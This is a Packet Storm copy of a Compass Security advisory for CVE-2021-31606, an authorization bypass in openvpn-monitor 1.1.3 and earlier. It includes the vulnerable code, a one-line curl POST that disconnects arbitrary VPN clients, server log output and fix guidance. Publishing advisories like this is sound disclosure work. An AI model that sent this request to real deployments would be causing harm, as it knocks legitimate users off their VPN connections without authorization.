exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

OpenVPN Monitor 1.1.3 Authorization Bypass / Denial Of Service

OpenVPN Monitor 1.1.3 Authorization Bypass / Denial Of Service
Posted Sep 24, 2021
Authored by Sylvain Heiniger, Emanuel Duss

OpenVPN Monitor versions 1.1.3 and below suffer from an authorization bypass vulnerability that allows an attacker to disconnect arbitrary clients, even if the disconnect feature is disabled.

tags | exploit, arbitrary, bypass
advisories | CVE-2021-31606
SHA-256 | 44443d6d17ea4c88ab04491310bc5cbff119d5c6333513c5f92e9d957fcdc127

OpenVPN Monitor 1.1.3 Authorization Bypass / Denial Of Service

Change Mirror Download
#############################################################
#
# COMPASS SECURITY ADVISORY
# https://www.compass-security.com/research/advisories/
#
#############################################################
#
# Product: openvpn-monitor
# Vendor: https://github.com/furlongm/openvpn-monitor
# CSNC ID: CSNC-2021-009
# CVE ID: CVE-2021-31606
# Subject: Authorization Bypass
# Severity: Medium
# Effect: Denial of Service
# Author: Emanuel Duss <emanuel.duss@compass-security.com>
# Sylvain Heiniger <sylvain.heiniger@compass-security.com>
# Date: 2021-09-22
#
#############################################################

Introduction
------------

openvpn-monitor is a simple Python program to generate HTML that displays the
status of an OpenVPN server, including all current connections. It uses the
OpenVPN management console. It typically runs on the same host as the OpenVPN
server. [0][1]

During a customer project, several security vulnerabilities were discovered in
this software.

This advisory describes an authorization bypass which allows an attacker to
disconnect arbitrary clients, even if the disconnect feature is disabled.


Affected
--------

- Vulnerable: openvpn-monitor <= 1.1.3
- Not vulnerable: none

The vulnerability is already fixed in the source code [3], but there is no new
release which contains the fix. Therefore, all currently available releases
contain this vulnerability.


Technical Description
---------------------

Starting the openvpn-monitor application without the
`OPENVPNMONITOR_SITES_0_SHOWDISCONNECT=True` option in order to disable the
disconnect functionality:

# docker run --rm --name openvpn-monitor --net host \
-e OPENVPNMONITOR_DEFAULT_DATETIMEFORMAT="%%H:%%M:%%S %%d/%%m/%%Y" \
-e OPENVPNMONITOR_DEFAULT_LATITUDE=-37 \
-e OPENVPNMONITOR_DEFAULT_LOGO=logo.jpg \
-e OPENVPNMONITOR_DEFAULT_LONGITUDE=144 \
-e OPENVPNMONITOR_DEFAULT_MAPS=True \
-e OPENVPNMONITOR_DEFAULT_SITE=Test \
-e OPENVPNMONITOR_SITES_0_ALIAS=UDP \
-e OPENVPNMONITOR_SITES_0_HOST=127.0.0.1 \
-e OPENVPNMONITOR_SITES_0_NAME=UDP \
-e OPENVPNMONITOR_SITES_0_PORT=5555 \
-e OPENVPNMONITOR_SITES_0_SHOWDISCONNECT=True \
-p 80:80 ruimarinho/openvpn-monitor

When the openvpn-monitor application is accessed, the disconnect button is not
displayed (as expected).

However, there is no authorization check implemented which check if the
functionality is allowed to be used or not:

[CUT BY COMPASS]
@app.route('/', method='POST')
def post_slash():
vpn_id = request.forms.get('vpn_id')
ip = request.forms.get('ip')
port = request.forms.get('port')
client_id = request.forms.get('client_id')
return render(vpn_id=vpn_id, ip=ip, port=port, client_id=client_id)
[CUT BY COMPASS]

An attacker can use this to disconnect arbitrary clients:

$ curl http://openvpn-monitor.example.net -d "vpn_id=UDP&ip=10.5.23.42&port=1194&client_id=5"

The client will be disconnected. This can be seen in the OpenVPN server log:

[CUT BY COMPASS]
2021-04-21 11:33:22 MANAGEMENT: Client connected from [AF_INET][undef]:5555
2021-04-21 11:33:22 MANAGEMENT: CMD 'version'
2021-04-21 11:33:22 MANAGEMENT: CMD 'client-kill 5'
2021-04-21 11:33:22 MANAGEMENT: CMD 'quit'
2021-04-21 11:33:22 MANAGEMENT: Client disconnected
2021-04-21 11:33:22 MANAGEMENT: Client connected from [AF_INET][undef]:5555
2021-04-21 11:33:22 MANAGEMENT: CMD 'version'
2021-04-21 11:33:22 MANAGEMENT: CMD 'state'
2021-04-21 11:33:22 MANAGEMENT: CMD 'status 3'
2021-04-21 11:33:22 MANAGEMENT: CMD 'quit'
2021-04-21 11:33:22 MANAGEMENT: Client disconnected
[CUT BY COMPASS]


Vulnerability Classification
----------------------------

CVSS v3.1 Metrics [4]:

* CVSS Base Score: 5.8
* CVSS Vector: AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:L


Workaround / Fix
----------------

# openvpn-monitor Vendor

Authorization checks should be implemented so that this functionality can only
be used if `OPENVPNMONITOR_SITES_0_SHOWDISCONNECT=True` is enabled. This has to
be enforced on the server and not on the client.

# openvpn-monitor Users

Users of the openvpn-monitor should either apply the patch which is available
on GitHub [2] or use the latest version from the source code repository [1].


Timeline
--------

2021-05-05: Vulnerability discovered
2021-04-20: Requested CVE ID @ MITRE
2021-04-20: Contacted vendor
2021-04-22: Sent details via email to vendor
2021-04-24: Vendor confirmed and already started to work on a fix
2021-09-08: Asked vendor for updates
2021-09-08: Vendor told it's OK to publish the advisory
2021-09-22: Public disclosure


References
----------

[0] http://openvpn-monitor.openbytes.ie/
[1] https://github.com/furlongm/openvpn-monitor
[2] https://github.com/furlongm/openvpn-monitor/commit/ddb9d31ef0ec56f578bdacf99ebe9d68455ed8ca
[3] https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:L&version=3.1


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close